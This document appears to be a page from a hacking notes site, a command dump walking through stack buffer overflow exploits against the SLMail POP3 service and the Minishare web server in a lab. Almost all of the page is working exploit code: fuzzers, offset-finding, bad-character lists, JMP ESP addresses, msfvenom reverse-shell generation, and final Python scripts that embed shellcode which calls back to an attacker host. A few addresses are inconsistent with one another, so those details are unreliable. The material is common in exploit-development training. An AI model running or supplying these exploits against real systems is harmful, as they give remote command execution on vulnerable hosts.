Hacking
GithubTwitter
Search…
Hacking
Hacking, Bug Bounties & Penetration Testing
The Hacker Lab
Methodologies
Basic Buffer Overflow
Basic Internal Network test
Basic Mobile Testing guide
Basic Subdomain Enumeration guide
Guides
Build A Raspberry Pi Dropbox
Golang
Powershell / PowerView
Hack The Box last updated - 2019
Legacy
Devel
Optimum
Popcorn
Beep
Tenten
Arctic
Cronos
Grandpa
Granny
October
Lazy
Sneaky
Holiday
Blocky
Shrek
Blue
Joker
Europa
Haircut
Bank
SolidState
Mantis
Shocker
Tally
Sense
Jeeves
Stratosphere
Inception
Bashed
Fluxcapacitor
Canape
Rabbit
Chatterbox
Nibbles
Sunday
Aragog
Valentine
Silo
Olympus
Poison
Celestial
Waldo
Jerry
Access
Active
Netmon
Powered By GitBook
Basic Buffer Overflow
A command dump of the basic SL mail buffer overflow
1
SL Mail
2
At each stage exit the service and exit Immunity debugger
3
Reload application and reload Immunity debugger
4
Attach Immunity Debugger to the service
5
Press Play
6
==============
7
Step 1 - Check you can connect to the service
8
==============
9
#!/usr/bin/python
10
import socket
11
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
12
try:
13
print "\nSending Evil Buffer..."
14
s.connect(('192.168.56.101',110))
15
data = s.recv(1024)
16
print data
17
s.send('User test' +'\r\n')
18
data = s.recv(1024)
19
print data
20
s.send('PASS test' + '\r\n')
21
print data
22
s.close()
23
print "\nDone!"
24
except:
25
print "Could not connect to POP3!"
26
Buffer Overflow - SL-Mail
27
14
28
----Notes-----
29
python SLmail1.py
30
Sending Evil Buffer...
31
+OK POP3 server xp-fa9c63481a5e ready <[email protected]>
32
+OK test welcome here
33
Connection works
34
==============
35
Step 2 - Fuzz the application to cause a crash
36
==============
37
#!/usr/bin/python
38
import socket
39
buffer=["A"]
40
counter=100
41
while len(buffer) <= 30:
42
buffer.append("A"*counter)
43
counter=counter+200
44
for string in buffer:
45
print "Fuzzing PASS with %s bytes" % len(string)
46
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
47
connect=s.connect(('192.168.56.101',110))
48
s.recv(1024)
49
s.send('USER test\r\n')
50
s.recv(1024)
51
s.send('PASS ' + string + '\r\n')
52
s.send('QUIT\r\n')
53
s.close()
54
----Notes-----
55
Buffer Overflow - SL-Mail
56
15
57
python SLmail2.py
58
Fuzzing PASS with 1 bytes
59
Fuzzing PASS with 100 bytes
60
Fuzzing PASS with 300 bytes
61
Fuzzing PASS with 500 bytes
62
Fuzzing PASS with 700 bytes
63
Fuzzing PASS with 900 bytes
64
Fuzzing PASS with 1100 bytes
65
Fuzzing PASS with 1300 bytes
66
Fuzzing PASS with 1500 bytes
67
Fuzzing PASS with 1700 bytes
68
Fuzzing PASS with 1900 bytes
69
Fuzzing PASS with 2100 bytes
70
Fuzzing PASS with 2300 bytes
71
Fuzzing PASS with 2500 bytes
72
Fuzzing PASS with 2700 bytes
73
Fuzzing PASS with 2900 bytes
74
Crash happens somewhere around the 2900 mark.
75
Look for EIP 41414141
76
==============
77
Step 3 - Ensure the expected fuzz causes a crash.
78
==============
79
Restart the service:
80
#!/usr/bin/python
81
import socket
82
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
83
buffer = 'A' * 2700
84
Buffer Overflow - SL-Mail
85
16
86
try:
87
print "\nSending Evil Buffer"
88
s.connect(('192.168.56.101',110))
89
data = s.recv(1024)
90
s.send('USER username' +'\r\n')
91
data = s.recv(1024)
92
s.send('PASS ' + buffer + '\r\n')
93
print "\nDone!."
94
except:
95
print "Could not conect to POP3!"
96
----Notes-----
97
python SLmail3.py
98
Should crash the server overwriting with 41414141
99
==============
100
Step 4 - Locate EIP overwrite length/ offset.
101
==============
102
Create a pattern at the 2700 mark and insert it into python script as buffer.
103
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2700
104
#!/usr/bin/python
105
import socket
106
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
107
buffer = 'Aa0Aa1Aa2A-patterngoeshere-a3Aa4Aa5Aa6A'
108
try:
109
print "\nSending Evil Buffer"
110
s.connect(('192.168.56.101',110))
111
data = s.recv(1024)
112
s.send('USER username' +'\r\n')
113
Buffer Overflow - SL-Mail
114
17
115
data = s.recv(1024)
116
s.send('PASS ' + buffer + '\r\n')
117
print "\nDone!."
118
except:
119
print "Could not conect to POP3!"
120
----Notes-----
121
Note the EIP value 39694438 in Immunity Debugger.
122
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 39694438
123
[*] Exact match at offset 2606
124
==============
125
Step 5 - Overwrite EIP with 4 x b (x42)
126
==============
127
#!/usr/bin/python
128
import socket
129
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
130
buffer = "A"*2606 + "B"*4 + "C"*90
131
try:
132
print "\nSending Evil Buffer"
133
s.connect(('192.168.56.101',110))
134
data = s.recv(1024)
135
s.send('USER username' +'\r\n')
136
data = s.recv(1024)
137
s.send('PASS ' + buffer + '\r\n')
138
print "\nDone!."
139
except:
140
print "Could not conect to POP3!"
141
----Notes-----
142
Buffer Overflow - SL-Mail
143
18
144
Look for 42424242 at EIP register
145
==============
146
Step 6 - Check Buffer Length is long enough to hold reverse shellcode.
147
==============
148
#!/usr/bin/python
149
import socket
150
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
151
buffer = "A"*2606 + "B"*4 + "C"*(3500-2606-4)
152
try:
153
print "\nSending Evil Buffer"
154
s.connect(('192.168.56.101',110))
155
data = s.recv(1024)
156
s.send('USER username' +'\r\n')
157
data = s.recv(1024)
158
s.send('PASS ' + buffer + '\r\n')
159
print "\nDone!."
160
except:
161
print "Could not conect to POP3!"
162
----Notes-----
163
This should work and give you a large amount of space
164
Rightclick ESP register and follow in dump and check there is lots of space over written with
165
x43
166
==============
167
Step 7 - Check for bad characters
168
==============
169
#!/usr/bin/python
170
import socket
171
Buffer Overflow - SL-Mail
172
19
173
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
174
badchars = (
175
"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x
176
15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
177
"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x
178
35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
179
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x
180
56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
181
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x
182
75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
183
"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x
184
95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
185
"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\x
186
b5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
187
"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5
188
\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
189
"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\x
190
f6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
191
buffer = "A"*2606 +"B"*4 + badchars
192
try:
193
print "\nSending Evil Buffer"
194
s.connect(('192.168.56.101',110))
195
data = s.recv(1024)
196
s.send('USER username' +'\r\n')
197
data = s.recv(1024)
198
s.send('PASS ' + buffer + '\r\n')
199
print "\nDone!."
200
except:
201
print "Could not conect to POP3!"
202
Buffer Overflow - SL-Mail
203
20
204
----Notes-----
205
Follow the ESP in dump and check for which characters cause the exploit to crash and is
206
mising until you have removed them all.
207
It should read 01 02 03 04 05 -missing- 07 which means x06 is a bad character.
208
Restart the debugger and the service every time you do this and rerun the script.
209
Note the bad characters you remove. The final three should read FD FE FF and then they
210
are all removed and it is not truncated.
211
In this case they are:
212
\x00\x0a\x0d\
213
==============
214
Step 8 - Locate JMP ESP
215
==============
216
In immunity debugger type
217
!mona modules
218
Choose a DLL that is FALSE FALSE FALSE FALSE TRUE
219
If it has no esp move to another
220
ie. SLMFC.dll
221
Upload jumpesp.exe to the host and run the following command:
222
findjmp.exe slmfc.dll esp
223
Choose a jmp esp from the list
224
I.e:
225
0x5F4BB41E3
226
Convert to little endian
227
5F | 4B | 41 | E3
228
\xe3\x41\x4b\x5f
229
Or In Immunity Debugger:
230
!mona find -s "\xff\xe4" -m slmfc.dll
231
Buffer Overflow - SL-Mail
232
21
233
=============
234
Step 9 - Final Overflow
235
=============
236
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.1 LPORT=443 -f c -e
237
x86/shikata_ga_nai -b "\x00\x0a\x0d"
238
Check x86/shikata_ga_nai encoded or you will have bad chars still in there.
239
#!/usr/bin/python
240
import socket
241
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
242
shellcode = (
243
"\xd9\xc8\xbe\xf1\x66\xed\xf4\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"
244
"\x52\x31\x73\x17\x03\x73\x17\x83\x32\x62\x0f\x01\x48\x83\x4d"
245
"\xea\xb0\x54\x32\x62\x55\x65\x72\x10\x1e\xd6\x42\x52\x72\xdb"
246
"\x29\x36\x66\x68\x5f\x9f\x89\xd9\xea\xf9\xa4\xda\x47\x39\xa7"
247
"\x58\x9a\x6e\x07\x60\x55\x63\x46\xa5\x88\x8e\x1a\x7e\xc6\x3d"
248
"\x8a\x0b\x92\xfd\x21\x47\x32\x86\xd6\x10\x35\xa7\x49\x2a\x6c"
249
"\x67\x68\xff\x04\x2e\x72\x1c\x20\xf8\x09\xd6\xde\xfb\xdb\x26"
250
"\x1e\x57\x22\x87\xed\xa9\x63\x20\x0e\xdc\x9d\x52\xb3\xe7\x5a"
251
"\x28\x6f\x6d\x78\x8a\xe4\xd5\xa4\x2a\x28\x83\x2f\x20\x85\xc7"
252
"\x77\x25\x18\x0b\x0c\x51\x91\xaa\xc2\xd3\xe1\x88\xc6\xb8\xb2"
253
"\xb1\x5f\x65\x14\xcd\xbf\xc6\xc9\x6b\xb4\xeb\x1e\x06\x97\x63"
254
"\xd2\x2b\x27\x74\x7c\x3b\x54\x46\x23\x97\xf2\xea\xac\x31\x05"
255
"\x0c\x87\x86\x99\xf3\x28\xf7\xb0\x37\x7c\xa7\xaa\x9e\xfd\x2c"
256
"\x2a\x1e\x28\xe2\x7a\xb0\x83\x43\x2a\x70\x74\x2c\x20\x7f\xab"
257
"\x4c\x4b\x55\xc4\xe7\xb6\x3e\x2b\x5f\x80\xbf\xc3\xa2\xf0\xbe"
258
"\xa8\x2a\x16\xaa\xde\x7a\x81\x43\x46\x27\x59\xf5\x87\xfd\x24"
259
"\x35\x03\xf2\xd9\xf8\xe4\x7f\xc9\x6d\x05\xca\xb3\x38\x1a\xe0"
260
Buffer Overflow - SL-Mail
261
22
262
"\xdb\xa7\x89\x6f\x1b\xa1\xb1\x27\x4c\xe6\x04\x3e\x18\x1a\x3e"
263
"\xe8\x3e\xe7\xa6\xd3\xfa\x3c\x1b\xdd\x03\xb0\x27\xf9\x13\x0c"
264
"\xa7\x45\x47\xc0\xfe\x13\x31\xa6\xa8\xd5\xeb\x70\x06\xbc\x7b"
265
"\x04\x64\x7f\xfd\x09\xa1\x09\xe1\xb8\x1c\x4c\x1e\x74\xc9\x58"
266
"\x67\x68\x69\xa6\xb2\x28\x99\xed\x9e\x19\x32\xa8\x4b\x18\x5f"
267
"\x4b\xa6\x5f\x66\xc8\x42\x20\x9d\xd0\x27\x25\xd9\x56\xd4\x57"
268
"\x72\x33\xda\xc4\x73\x16")
269
buffer = "A"*2606 +"\xe3\x41\x4b\x5f" + "\x90"*8 + shellcode
270
try:
271
print "\nSending Evil Buffer"
272
s.connect(('192.168.56.101',110))
273
data = s.recv(1024)
274
s.send('USER username' +'\r\n')
275
data = s.recv(1024)
276
s.send('PASS ' + buffer + '\r\n')
277
print "\nDone!."
278
except:
279
print "Could not conect to POP3!"
280
281
Minishare
282
==============
283
Step 1 - Crash The Service
284
==============
285
#!/usr/bin/python
286
import socket
287
target_address="192.168.56.101"
288
target_port=81
289
print "Sending long URL"
290
buffer ="GET "
291
buffer +="\x41" * 2000
292
buffer +=" HTTP/1.1\r\n\r\n"
293
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
294
connect=sock.connect((target_address,target_port))
295
sock.send(buffer)
296
sock.close()
297
print "Sent! Check the server has crashed"
298
==============
299
Step 2 - Find The ESP
300
==============
301
#!/usr/bin/python
302
#Stage 2
303
#[email protected]:10.11.1.125# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l
304
2000
305
import socket
306
Buffer Overflow - Minishare
307
24
308
target_address="192.168.56.101"
309
target_port=81
310
print "Sending long URL"
311
buffer ="GET "
312
buffer
313
+="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1
314
Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4
315
Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8A
316
g9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4
317
Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am
318
0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1
319
Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4
320
Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8A
321
s9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3
322
Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5A
323
x6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9
324
Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2
325
Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5
326
Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9B
327
h0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5B
328
j6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1
329
Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo
330
3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq
331
6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0B
332
t1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv
333
5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7
334
Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0C
335
a1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc
336
3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5
337
Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg
338
9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj
339
4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9
340
Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co
341
0Co1Co2Co3Co4Co5Co"
342
buffer +=" HTTP/1.1\r\n\r\n"
343
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
344
connect=sock.connect((target_address,target_port))
345
sock.send(buffer)
346
sock.close()
347
print "Sent! Check the server has crashed"
348
==============
349
Step 3 - Overwrite EIP with B's
350
==============
351
#!/usr/bin/python
352
#Stage 3
353
#[email protected]:10.11.1.125# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l
354
2000
355
#[email protected]:10.11.1.125# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q
356
36684335
357
import socket
358
target_address="192.168.56.101"
359
target_port=81
360
print "Sending long URL"
361
buffer ="GET "
362
buffer +="A" * 1787 + "B" * 4 + "C" * (1866-1787-4)
363
buffer +=" HTTP/1.1\r\n\r\n"
364
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
365
connect=sock.connect((target_address,target_port))
366
sock.send(buffer)
367
sock.close()
368
print "Sent! Check the server has crashed"
369
==============
370
Step 4 - Increase Buffer Size to make sure we have room for shellcode
371
==============
372
Buffer Overflow - Minishare
373
26
374
#!/usr/bin/python
375
#Stage 4
376
#[email protected]:10.11.1.125# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l
377
2000
378
#[email protected]:10.11.1.125# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q
379
36684335
380
#Increase buffer size to see if our shellcode works and has enough space
381
import socket
382
target_address="192.168.56.101"
383
target_port=81
384
print "Sending long URL"
385
buffer ="GET "
386
buffer +="A" * 1787 + "B" * 4 + "C" * 409
387
buffer +=" HTTP/1.1\r\n\r\n"
388
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
389
connect=sock.connect((target_address,target_port))
390
sock.send(buffer)
391
sock.close()
392
print "Sent! Check the server has crashed"
393
==============
394
Step 5 - Find return Address and remove all bad characters
395
==============
396
#!mona modules
397
#!mona find -s "\xff\xe4" -m user32.dll = 0x73429353
398
73 | 42 | 93 | 53
399
\x53\x93\x42\x73
400
See stage 7 from SLMail for finding bad characters.
401
Buffer Overflow - Minishare
402
27
403
==============
404
Step 6 - Generate New Reverse Shell
405
==============
406
#!/usr/bin/python
407
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.1 LPORT=443 -b
408
"\x00\x0a\x0d" -f c
409
import socket
410
shellcode = (
411
"\xdb\xd8\xbf\x4c\x49\x8a\x73\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1"
412
"\x52\x83\xea\xfc\x31\x7a\x13\x03\x36\x5a\x68\x86\x3a\xb4\xee"
413
"\x69\xc2\x45\x8f\xe0\x27\x74\x8f\x97\x2c\x27\x3f\xd3\x60\xc4"
414
"\xb4\xb1\x90\x5f\xb8\x1d\x97\xe8\x77\x78\x96\xe9\x24\xb8\xb9"
415
"\x69\x37\xed\x19\x53\xf8\xe0\x58\x94\xe5\x09\x08\x4d\x61\xbf"
416
"\xbc\xfa\x3f\x7c\x37\xb0\xae\x04\xa4\x01\xd0\x25\x7b\x19\x8b"
417
"\xe5\x7a\xce\xa7\xaf\x64\x13\x8d\x66\x1f\xe7\x79\x79\xc9\x39"
418
"\x81\xd6\x34\xf6\x70\x26\x71\x31\x6b\x5d\x8b\x41\x16\x66\x48"
419
"\x3b\xcc\xe3\x4a\x9b\x87\x54\xb6\x1d\x4b\x02\x3d\x11\x20\x40"
420
"\x19\x36\xb7\x85\x12\x42\x3c\x28\xf4\xc2\x06\x0f\xd0\x8f\xdd"
421
"\x2e\x41\x6a\xb3\x4f\x91\xd5\x6c\xea\xda\xf8\x79\x87\x81\x94"
422
"\x4e\xaa\x39\x65\xd9\xbd\x4a\x57\x46\x16\xc4\xdb\x0f\xb0\x13"
423
"\x1b\x3a\x04\x8b\xe2\xc5\x75\x82\x20\x91\x25\xbc\x81\x9a\xad"
424
"\x3c\x2d\x4f\x61\x6c\x81\x20\xc2\xdc\x61\x91\xaa\x36\x6e\xce"
425
"\xcb\x39\xa4\x67\x61\xc0\x2f\x48\xde\xf2\xae\x20\x1d\x02\xb0"
426
"\x0b\xa8\xe4\xd8\x7b\xfd\xbf\x74\xe5\xa4\x4b\xe4\xea\x72\x36"
427
"\x26\x60\x71\xc7\xe9\x81\xfc\xdb\x9e\x61\x4b\x81\x09\x7d\x61"
428
"\xad\xd6\xec\xee\x2d\x90\x0c\xb9\x7a\xf5\xe3\xb0\xee\xeb\x5a"
429
"\x6b\x0c\xf6\x3b\x54\x94\x2d\xf8\x5b\x15\xa3\x44\x78\x05\x7d"
430
"\x44\xc4\x71\xd1\x13\x92\x2f\x97\xcd\x54\x99\x41\xa1\x3e\x4d"
431
"\x17\x89\x80\x0b\x18\xc4\x76\xf3\xa9\xb1\xce\x0c\x05\x56\xc7"
432
"\x75\x7b\xc6\x28\xac\x3f\xf6\x62\xec\x16\x9f\x2a\x65\x2b\xc2"
433
"\xcc\x50\x68\xfb\x4e\x50\x11\xf8\x4f\x11\x14\x44\xc8\xca\x64"
434
"\xd5\xbd\xec\xdb\xd6\x97"
435
)
436
target_address="192.168.56.101"
437
target_port=81
438
print "Sending exploit"
439
buffer ="GET "
440
buffer +="A" * 1787 + "\x53\x93\x42\x7e" + "\x90" * 20 + shellcode
441
buffer +=" HTTP/1.1\r\n\r\n"
442
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
443
connect=sock.connect((target_address,target_port))
444
sock.send(buffer)
445
sock.close()
446
print "Sent! Did you get a shell?"
447
Copied!
Previous
The Hacker Lab
Next - Methodologies
Basic Internal Network test
Last modified 3yr ago
Copy link